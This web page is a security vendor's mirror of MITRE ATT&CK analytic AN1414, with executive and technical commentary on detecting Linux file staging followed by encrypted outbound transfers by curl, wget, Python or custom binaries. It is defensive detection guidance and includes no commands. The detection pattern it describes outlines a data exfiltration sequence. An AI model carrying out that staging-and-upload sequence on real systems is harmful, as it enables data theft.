Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN1414: Analytic 1414

Detects staged file access (e.g., archive or obfuscation), followed by an encrypted outbound connection (TLS/HTTPS) from unusual processes such as curl/wget, Python scripts, or custom binaries.

EnterpriseAN1414AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN1414 is a Linux-focused detection analytic for a suspicious sequence: files appear to be staged or prepared, such as through archiving or obfuscation, and then an encrypted outbound TLS/HTTPS connection is made by an unusual process such as curl, wget, a Python script, or a custom binary. For leaders, the value is not the individual use of HTTPS or command-line tools—both can be normal—but whether the organization can recognize when file preparation and outbound transfer behavior combine into a potential data movement pattern.

Executive priority

Prioritize this analytic as a validation point for Linux server monitoring, SOC triage quality, and incident response readiness. It helps answer whether teams can produce evidence around suspicious outbound activity from servers or workloads, especially when encrypted traffic limits content inspection. The business decision is whether existing logging, egress controls, and alert review processes can distinguish routine administrative automation from potentially unauthorized file staging and outbound transfer.

Technical view

SOC and detection teams should validate correlation between Linux file staging indicators and outbound TLS/HTTPS connections from processes such as curl, wget, Python interpreters, or unfamiliar binaries. Because no official detection logic is provided, teams should define local baselines for expected automation, backup jobs, package managers, deployment tooling, and administrative scripts. Investigations should focus on process lineage, command-line context, file paths touched before connection, destination reputation or novelty, user/service account context, and whether the process is expected on that host.

Likely telemetry

  • Linux process execution telemetry, including process name, command line, parent process, user, and working directory
  • File access or file creation telemetry for archives, packed files, staged directories, or recently modified collections of files
  • Network connection metadata for outbound TLS/HTTPS sessions, including destination IP/domain, port, process attribution where available, and timing
  • Host inventory or allowlist context for expected curl, wget, Python, and custom binary usage
  • Authentication or session context for the user or service account that launched the process

Detection direction

  • Correlate staged file access followed closely by outbound encrypted connections rather than alerting on curl, wget, Python, or HTTPS in isolation.
  • Tune against known-good Linux automation such as backups, software updates, configuration management, CI/CD tasks, and approved administrative scripts.
  • Prioritize unusual parent-child process chains, rare binaries, rare destinations, first-seen outbound domains, unexpected working directories, and activity from sensitive servers.
  • Account for blind spots where network telemetry lacks process attribution, where TLS content is not inspected, or where Linux file auditing is limited.
  • Because ATT&CK provides no official detection logic or tactic mapping for this object, treat AN1414 as a detection design pattern that requires local thresholding and validation.

Mitigation priorities

  • Establish Linux logging coverage for process execution, file activity, and outbound network metadata before relying on this analytic.
  • Define and maintain approved administrative and automation patterns for curl, wget, Python, and custom binaries on Linux systems.
  • Use egress governance to limit outbound destinations and require review for unusual server-to-Internet connections where operationally feasible.
  • Document incident response playbooks for suspected file staging and encrypted outbound transfer, including host isolation criteria and evidence preservation.
  • Review coverage as part of compliance and audit readiness where evidence of monitoring, egress control, and investigation handling is required.
Analyst notes and limits

This object is a detection analytic, not a technique or procedure, and no relationship context was supplied. The strongest use is as a practical validation exercise: can defenders connect Linux file staging behavior to encrypted outbound network activity by unusual or locally rare processes? Local baselining is essential because many listed tools have legitimate administrative uses.

The supplied ATT&CK fields do not include official detection logic, tactics, related techniques, data sources, mitigations, attribution, or evidence of active exploitation. Conclusions are limited to the Linux platform and the behavior described in the official description.

Official MITRE ATT&CK definition

Analytic 1414

Detects staged file access (e.g., archive or obfuscation), followed by an encrypted outbound connection (TLS/HTTPS) from unusual processes such as curl/wget, Python scripts, or custom binaries.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
ef01c4f1a28aaade...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle ef01c4f1a28a…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN1414
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use